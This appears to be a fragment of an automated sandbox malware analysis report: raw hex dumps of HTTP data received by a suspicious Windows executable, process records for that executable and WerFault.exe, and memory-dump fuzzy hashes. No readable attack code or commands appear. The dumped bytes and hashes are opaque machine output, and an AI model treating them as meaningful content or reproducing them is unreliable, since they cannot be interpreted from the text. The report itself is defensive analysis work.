                                                                                                                                                          Data Ascii: eDirectory: can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)S
                                                                                                                                                          2024-12-23 08:17:07 UTC1024INData Raw: e8 c7 e6 52 b1 3a d6 d7 02 ab 3a 7c 39 58 c5 d6 e5 20 f1 ec 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be
                                                                                                                                                          Data Ascii: R::|9X 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07z~k\S
                                                                                                                                                          2024-12-23 08:17:07 UTC1749INData Raw: d4 c8 e6 cd 9b 1b d9 b2 65 8b 42 be 6f dd ba 55 21 d3 b7 6d db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5
                                                                                                                                                          Data Ascii: eBoU!m/od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz
                                                                                                                                                          2024-12-23 08:17:07 UTC16384INData Raw: d0 9b cc 4a 88 37 9b 81 b5 cb 97 d9 92 b5 3d 81 9b 49 5f 84 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61
                                                                                                                                                          Data Ascii: J7=I_AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hza
                                                                                                                                                          2024-12-23 08:17:07 UTC1024INData Raw: 1a 27 ce 34 4e 62 c1 bb bd 69 f3 73 33 69 41 bb a7 99 27 79 7c 06 85 ec d9 47 19 9c dc b2 0a 72 1a 0d 00 b0 32 01 6d 31 02 97 6a 00 04 11 04 5d 2c 74 1a 05 df 84 0d 40 45 75 21 95 55 16 52 54 50 05 ad 9d de 40 d3 1e 3a 43 53 99 b5 af 34 50 64 20 8b 5e 55 11 55 d6 5e 6c 00 20 f0 e5 dc 62 ce 88 4f a1 e0 1d 9e b4 f7 8d 55 e4 f2 fa 0a 0a dc e2 aa ee 2d 2e 87 01 a8 fe ee 0d 00 c4 1f 5d fc 19 55 d5 14 7c f2 0c b7 fc 3f 51 e2 7f f0 e4 69 4a ab ac a2 52 2e 8f b2 ef 91 01 90 63 84 f5 e3 a9 67 00 e3 22 f0 fa b1 95 71 39 ee 66 bd 68 34 00 5c 77 f2 58 a0 73 73 b2 29 31 23 9f 0e 25 17 53 44 6a 31 65 e7 e4 52 79 41 16 15 e4 36 d5 41 bc 16 16 ef b1 28 28 2c a2 fc 82 42 ca e5 f5 a0 4e ca 79 7b a9 d3 40 89 b5 32 01 5c c7 f3 b8 3e e7 f2 b8 6f 08 25 4c df 44 99 5d 27 53 f5
                                                                                                                                                          Data Ascii: '4Nbis3iA'y|Gr2m1j],t@Eu!URTP@:CS4Pd ^UU^l bOU-.]U|?QiJR.cg"q9fh4\wXss)1#%SDj1eRyA6A((,BNy{@2\>o%LD]'S
                                                                                                                                                          2024-12-23 08:17:07 UTC16384INData Raw: 8e 25 5a ee e8 d2 c7 6d e2 6e 1e ee e4 e6 ee a6 04 7f d3 d2 f5 b4 fa 8d a5 b4 7a de 52 da b4 64 1d ed dc e6 44 7b 5d f7 aa 65 f0 54 59 08 3e ea 08 62 05 f5 1b 26 e2 bd f7 de a3 d1 a3 47 b7 66 00 76 b2 9a e3 41 40 78 11 d0 33 cc 93 37 74 bf fd 95 1b fb 76 0e bf 71 d0 3d 5f de fc c2 fd 74 f3 90 fb e9 c6 e7 ef fb ec 86 41 f7 06 dc 32 a8 43 7f 5e 46 06 11 ff 2b 32 00 d5 a1 83 07 d5 84 0d f6 ad 3c 3c d0 df 3e e9 bb 19 de 3a d7 d0 7e ee 67 c7 07 bd f6 eb 0f 77 be f6 cd f9 af 97 13 d1 32 66 ce 85 33 a7 66 7d 7c 0a 85 a2 0f 57 dd 00 20 51 a0 15 83 eb 00 70 ee 06 c9 03 15 01 dd 39 a0 c9 08 84 52 78 84 8d b0 f0 96 bb f3 04 d3 10 98 06 40 2a 9d 59 a1 25 58 24 a0 04 3d 78 81 24 80 46 03 c0 e0 71 99 78 2e 76 d8 be 03 e4 f6 da 2a 65 02 36 f5 9b 4e ee 3c 1e e1 13 44 69
                                                                                                                                                          Data Ascii: %ZmnzRdD{]eTY>b&GfvA@x37tvq=_tA2C^F+2<<>:~gw2f3f}|W Qp9Rx@*Y%X$=x$Fqx.v*e6N<Di



                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:03:16:36
                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                          Path:C:\Users\user\Desktop\BJQizQ6sqT.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Users\user\Desktop\BJQizQ6sqT.exe"
                                                                                                                                                          Imagebase:0xa30000
                                                                                                                                                          File size:2'916'352 bytes
                                                                                                                                                          MD5 hash:DAED40D82D8D43F2AD0BE3FB944C99A3
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:12
                                                                                                                                                          Start time:03:17:10
                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 1988
                                                                                                                                                          Imagebase:0x3d0000
                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000003.2368644392.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FE8000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_3_fe8000_BJQizQ6sqT.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Inte
                                                                                                                                                            • API String ID: 0-4086957988
                                                                                                                                                            • Opcode ID: 84d26b0c12f5b3b81951b6d0eb7f902a7353da7e124d0783429ffb958ca6b73a
                                                                                                                                                            • Instruction ID: 57b17db556b3053b36777cfa4e3e3ad182d4dc91251336a8067323c61ec4e0fa
                                                                                                                                                            • Opcode Fuzzy Hash: 84d26b0c12f5b3b81951b6d0eb7f902a7353da7e124d0783429ffb958ca6b73a
                                                                                                                                                            • Instruction Fuzzy Hash: 8FA2A69244E3C25FC71387745C79AA17FB0AE13118B0E46DBC4D9CF4A3E289591AE7A3
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000003.2368644392.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FE8000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_3_fe8000_BJQizQ6sqT.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7bbe7bb8b855937e1c7fbff0673d22480f1ba681d3382fcc71b8bec1c8c76c76
                                                                                                                                                            • Instruction ID: d54f6d8c05f57560f5ac0ed4ab4f576f42c3400a25073db7b61faacd04df5439
                                                                                                                                                            • Opcode Fuzzy Hash: 7bbe7bb8b855937e1c7fbff0673d22480f1ba681d3382fcc71b8bec1c8c76c76
                                                                                                                                                            • Instruction Fuzzy Hash: 2C81CE6244E3D05FC71387306D386A1BF706B67214B0E85EFD4C68F4A3D21A5A0AE763